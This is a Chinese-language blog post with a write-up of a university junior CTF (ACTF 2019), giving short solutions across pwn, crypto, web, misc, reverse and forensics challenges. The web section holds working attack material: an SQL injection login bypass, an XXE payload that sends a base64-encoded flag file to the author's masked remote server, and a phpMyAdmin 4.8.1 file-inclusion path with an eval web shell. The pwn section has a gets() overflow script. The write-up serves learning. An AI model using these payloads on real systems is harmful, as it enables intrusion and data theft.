<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
    <meta name="keywords" content="hexo, autumn, phosphorus15, cs">
    <title>
        Phosphorus&#39; Blog
    </title>
    <!-- favicon -->
    
    <link rel="icon" href="https://github.githubassets.com/favicon.ico">
    
    <link rel="stylesheet" href="/css/style.css">

    <!-- highlight -->
    <link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.12.0/styles/github-gist.min.css">
    <script src="//cdn.bootcss.com/highlight.js/9.2.0/highlight.min.js"></script>
    <script>
        hljs.initHighlightingOnLoad()
    </script>
    <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/frontendsophie/hexo-infinite-scroll@1.0.0/dist/hexo-infinite-scroll.min.css">
    <script src="https://cdn.jsdelivr.net/gh/frontendsophie/hexo-infinite-scroll@1.0.0/dist/hexo-infinite-scroll.min.js"></script>
    <script>
        infiniteScroll()

        // for mobile menu
        $(function () {
            $('.social-button').click(function () {
                if ($('.social-links').hasClass('hide-links')) {
                    $('.social-links').removeClass('hide-links')
                } else {
                    $('.social-links').addClass('hide-links')
                }
            })
        })
    </script>
</head>

    <body style="background: url(https://cdn.jsdelivr.net/gh/frontendsophie/hexo-theme-autumn@1.0.0/source/img/button-bg.png) #f3f3f3">
        <div class="container">
            <header class="header">
    <h1 class="title">
        <a href="/" class="logo">
            Phosphorus&#39; Blog
        </a>
    </h1>
    <h2 class="desc">
        Learning, Discovering, Exploiting
    </h2>

    <nav class="links">
        <button class="social-button">
            menu
        </button>
        <ul class="social-links hide-links">
            
                <li>
                    <a href="https://github.com/Phosphorus15">
                        Github
                    </a>
                </li>
                
                <li>
                    <a href="https://blog.csdn.net/wxx1237/">
                        CSDN
                    </a>
                </li>
                
        </ul>
    </nav>
</header>
                <main class="main">
                    <article class="post">
    
    
    
    <h2 class="post-title">
        ACTF 新人赛 writeup
    </h2>
    <ul class="post-date">
        <li>
            2019-03-01
        </li>
        <li>
            Phosphorus15
        </li>
    </ul>
    <div class="post-content">
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>​    本校新人赛的<code>write-up</code>，因为时间匆忙写得很简陋，因为总体难度比较水，所以没啥参考价值也。。不过还是给挂上来了~~请大手子轻喷。</p>
<p>​    点此<a href="https://github.com/CSUAuroraLab/ACTF_Junior_2019" target="_blank" rel="noopener">链接</a>查看所有题目内容</p>
<h3 id="Linux-amp-Pwn"><a href="#Linux-amp-Pwn" class="headerlink" title="Linux &amp; Pwn"></a>Linux &amp; Pwn</h3><ul>
<li><p>vim</p>
<p><code>nc</code>连上之后是vim的编辑屏幕，很容易就能想到用<code>:sh</code>命令切入控制台。</p>
</li>
<li><p>Linux基础</p>
<p>大概是。。很简单的题目？不记得了=-=</p>
</li>
<li><p>瑞士军刀</p>
<p>直接用<code>pwntools</code>往上面打一个payload: <code>50 * &#39;a&#39; + &#39;$&#39;</code></p>
</li>
<li><p>极光宝</p>
<p>一番摸索之后想到存钱也许可以用负数（实际上就是给账户加钱了），尝试以后发现果然没有下界检查，直接<code>-1000</code>完事</p>
</li>
<li><p>No_more_gets1</p>
<p>很简单的<code>gets</code>利用，可以在注册部分填写密码时覆盖到栈上的用户名内容，强行注册一个<code>admin</code>账号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> args[<span class="string">'REMOTE'</span>]:</span><br><span class="line">    sh = remote(sys.argv[<span class="number">1</span>], sys.argv[<span class="number">2</span>])</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    sh = process(<span class="string">"./a.out"</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="number">0x10</span> * <span class="string">'a'</span> + p64(<span class="number">0x0</span>) + p64(<span class="number">0x555555555607</span>)</span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">"6) Exit"</span>)</span><br><span class="line">sh.sendline(<span class="string">"3"</span>)</span><br><span class="line">sh.recvuntil(<span class="string">"Input your name"</span>)</span><br><span class="line">sh.sendline(<span class="string">'father'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'Input your password'</span>)</span><br><span class="line">sh.sendline(<span class="string">'aaaaaaaaaaaaaaa\0admin\0'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">"6) Exit"</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
</li>
<li><p>ed</p>
<p>会用<code>ed</code>就没问题，一开始发现后面的<code>AmB</code>有点奇怪，于是猜测在前缀以后是四个字符一行（正好），依次键入每一行以及命令，获得<code>flag</code></p>
</li>
<li><p>Special_Shell</p>
<p>没有什么用的过滤，使用模糊匹配<code>/b??/?a?</code>就能调用<code>cat</code>，随即输出flag文件</p>
</li>
</ul>
<h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><ul>
<li><p>casear</p>
<p><del>听说出题人被锤了</del>，顾名思义，直接用凯撒密码解，找到<code>actf</code>开头的，仔细观察发现数字都不正确（全都比正确的大<code>2</code>），修改之后获得flag</p>
</li>
<li><p>矾书</p>
<p>用<code>Adobe Illustrator</code>打开（不知道为啥，其它的就是不行），然后全选（或者加一个黑底色图层），就能看到flag</p>
</li>
<li><p>反切码</p>
<p>稍微搜索一下，找到反切码对照表，然后发现是<code>yao4 chi1 shuan4 yang2 rou4</code>（<del>看来出题人挺饿的</del>），得到flag</p>
</li>
<li><p>Tiny RSA</p>
<p><code>q p m e</code>给全了，直接<code>r = (q-1)(p-1)</code>，然后求模反<code>d</code>，直接加密获得结果。</p>
</li>
<li><p>Broken Random</p>
<p>瞅准时机，猜对seed，直接爆破，BOOM! （咳咳）</p>
</li>
</ul>
<h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><ul>
<li><p>ssh</p>
<p>就是正常的ssh，直接连接到服务器上，查看<code>flag</code></p>
</li>
<li><p>SQL Injection</p>
<p>没有太多套路的<code>SQL</code>注入（但是貌似加了括号？），直接在用户名处<code>&#39;) or 1=1 --</code>,就能登入</p>
</li>
<li><p>XXE</p>
<p>以前从来没接触过的<code>XXE</code>。。（现学现卖系列？），因为没有回显，所以被迫用了自己的vps，两个xml如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;  </span><br><span class="line">&lt;!DOCTYPE ANY [  </span><br><span class="line">&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=/flag&quot;&gt;</span><br><span class="line">&lt;!-- not gonna tell u my vps XDDD --&gt;</span><br><span class="line">&lt;!ENTITY % dtd SYSTEM &quot;http://84.***.***.1**/exp.xml&quot;&gt;</span><br><span class="line">%dtd;</span><br><span class="line">%all;</span><br><span class="line">%send;</span><br><span class="line">]&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % all</span><br><span class="line">&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &apos;http://84.***.***.1**/?%file;&apos;&gt;&quot;</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>HTTP闯三关</p>
<p>用<code>f12</code>工具箱跟着指示走，各种解决方案或多或少都有提示。（比如<code>X-Forwarded-For</code>那里的标题就是<code>XFF</code>）</p>
</li>
<li><p>点赞</p>
<p>写一个可爱的小脚本~（因为找不到原来的文件了，所以这里放的是当时的截图）</p>
<p><img src="http://i1.bvimg.com/678826/2c6fd556759811da.jpg" alt="Kt!!!"></p>
<p>为什么不用Python?</p>
<blockquote>
<p>Maybe Next Time XDDDD</p>
</blockquote>
</li>
<li><p>phpmyadmin</p>
<p>稍微谷歌了一下就发现了<code>4.8.1</code>一个<strong>广为人知</strong>的漏洞，利用参数处理的漏洞来显示服务器的任意文件。只要形如<code>http://host/index.php?target=db_sql.php%253f../../</code>的形式就能访问任意文件。</p>
<p>试了半天才找出了根目录的位置（找的是/etc/passwd）。然后提交了一个包含<code>&lt;? eval($GET(&#39;z&#39;)) ?&gt;</code>的sql请求，再打开当前<code>session</code>文件，就能用提交<code>z</code>参数的形式执行任意命令。此时相当于获得了<code>shell</code>，很容易就能用<code>find</code>找出flag。</p>
</li>
</ul>
<h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><ul>
<li><p>签到题</p>
<p>真-签到题，直接交<code>flag</code></p>
</li>
<li><p>base家族</p>
<p>随便找个工具<code>base</code>一波，顺序是<code>64-&gt;32-&gt;16</code>。</p>
</li>
<li><p>Wireshark</p>
<p>用wireshark打开抓包记录，直接在某个http包的Content里就能看到flag<em>貌似</em>？</p>
</li>
<li><p>wordHidden</p>
<p><del>不想用常规方法解</del>，直接解压之后搜二进制找到后一半flag，在文件属性里找到前一半</p>
</li>
<li><p>keypad</p>
<p>结合<code>Hint</code>和前缀的数字数目，猜到是两个数字一对，代表<code>键位-字母序</code>,参考九键布局，获得flag</p>
</li>
<li><p>xor</p>
<p>采取了<code>Aggressive Approach</code>，通过Patcher把原来的条件跳转一行修改了一下，变为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">  400844:	0f be c0             	movsbl %al,%eax</span><br><span class="line">  400847:	31 c8                	xor    %ecx,%eax</span><br><span class="line">  400849:	39 c2                	cmp    %eax,%edx</span><br><span class="line">+ 40084b:	75 11                	jne    40085e &lt;main+0x218&gt;</span><br><span class="line">  40084d:	bf 3b 09 40 00       	mov    $0x40093b,%edi</span><br><span class="line">  400852:	e8 99 fc ff ff       	callq  4004f0 &lt;puts@plt&gt;</span><br></pre></td></tr></table></figure>
<p>然后安上<code>gdb</code>动态调试，把<code>eax</code>的内容全部记下来，组成flag</p>
</li>
</ul>
<h3 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h3><ul>
<li><p>show me the code</p>
<p>运行程序以后查看代码，根据其运算方式进行逆向计算，获得flag （直接在python的<code>repl</code>里完成，并没有exp保留）</p>
</li>
<li><p>simplepacker</p>
<p><del>显然，出题人并没有很好地加壳，</del>直接对二进制进行搜索就能捉到flag。</p>
</li>
<li><p>pyre</p>
<p>经过简单的推演就能发现，程序只需要用到下标为<code>0 1 2 4 6</code>的数字，分别为<code>7 8 12 4 19</code></p>
</li>
<li><p>simple asm</p>
<p>稍作推演就可以大致写出pseudocode</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">void func(char * str) &#123;</span><br><span class="line">	for(int i = 0 ; i &lt;= 21 ; i ++) &#123;</span><br><span class="line">		int edx = str[i];</span><br><span class="line">		edx += 7;         // str[i] += 7;</span><br><span class="line">		str[i] = edx;</span><br><span class="line">		int ecx = str[i];</span><br><span class="line">		int rdx = i;</span><br><span class="line">		int eax = enstr[i];</span><br><span class="line">		if(eax == edx) return 0;</span><br><span class="line">	&#125;</span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后就是一波逆向演算。</p>
</li>
<li><p>Key-R</p>
<p>正如其名，用<code>IDA</code>下的<code>R</code>键将二进制当作字符串查看，获得flag</p>
</li>
</ul>
<h3 id="Forensics"><a href="#Forensics" class="headerlink" title="Forensics"></a>Forensics</h3><p>辛苦出题人（们）啦，还专门弄了台<code>Windows 10</code>的虚拟机。<del>（虽然<code>Challenge</code>打错了）</del></p>
<ul>
<li><p>Hidden</p>
<ul>
<li style="list-style: none"><input type="checkbox" checked> 显示隐藏文件</li>
</ul>
</li>
<li><p>Visiting History</p>
<p>打开浏览器历史纪录，找到flag</p>
</li>
<li><p>Popbox</p>
<p>在控制台重定向<code>stdout</code>到一个文件，获得flag</p>
</li>
<li><p>DoNothing</p>
<p>把Memory <code>Dump</code>一下，得到flag</p>
</li>
<li><p>Memory</p>
<p>把Memory <code>Dump</code>一下，得到flag</p>
</li>
<li><p>WireFish</p>
<p>WireShark 监听所有TCP连接，发现程序有HTTP协议收发，从报文里获得flag</p>
</li>
<li><p>log</p>
<p>在系统监控日志里找到一个删除含<code>flag</code>目录名的失败尝试</p>
</li>
<li><p>can’t</p>
<p>用rename的方式强行获得一个<code>.flag</code>文件，获得flag</p>
</li>
<li><p>png</p>
<p>pngcheck发现图像尺寸有问题（校验和错误），修改文件头（<code>0x10</code>开始）代表高度的第二个int32，获得flag</p>
</li>
<li><p>jpg</p>
<p>用<code>HxD</code>查看发现有zip文件记录，故将文件格式改为zip，在图片的注释里可以找到压缩密码，获得本题的flag</p>
</li>
<li><p>jpg1</p>
<p>解压其中的png，用<code>pngcheck</code>无异常，但是发现了<code>Adobe Fireworks</code>的文件记录（一开始觉得没什么用，后面才有人告诉我存在<code>Adobe Fireworks</code>这个软件。。。）。用<code>Adobe Fireworks</code><del><code>Adobe Firearms</code></del>打开，发现有一个隐藏图层，flag就藏在里面</p>
</li>
</ul>
<h3 id="Phishing"><a href="#Phishing" class="headerlink" title="Phishing"></a>Phishing</h3><p>​    <strong>开学了，没时间做了 qwq</strong></p>

    </div>
</article>
                </main>
                <aside class="aside">
                    <section class="aside-section">
                        
    <h1>Categories</h1>

    

                    </section>
                    <section class="aside-section">
                        
    <h1>Archives</h1>

    <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/">2019</a></li></ul>


                    </section>
                    <section class="aside-section tag">
                        
    <h1>Tags</h1>

    <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/article/">article</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/binary/">binary</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/compiler/">compiler</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/cuda/">cuda</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/data-structures/">data_structures</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/environment-setup/">environment setup</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/functional-programming/">functional programming</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/haskell/">haskell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/heap/">heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/llvm/">llvm</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/plt/">plt</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/programming-language/">programming language</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/rust/">rust</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/scientific-computing/">scientific computing</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/script/">script</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shell/">shell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/test/">test</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tips/">tips</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/type-systems/">type systems</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/writeup/">writeup</a></li></ul>

                    </section>
                </aside>
        </div>
    </body>

</html>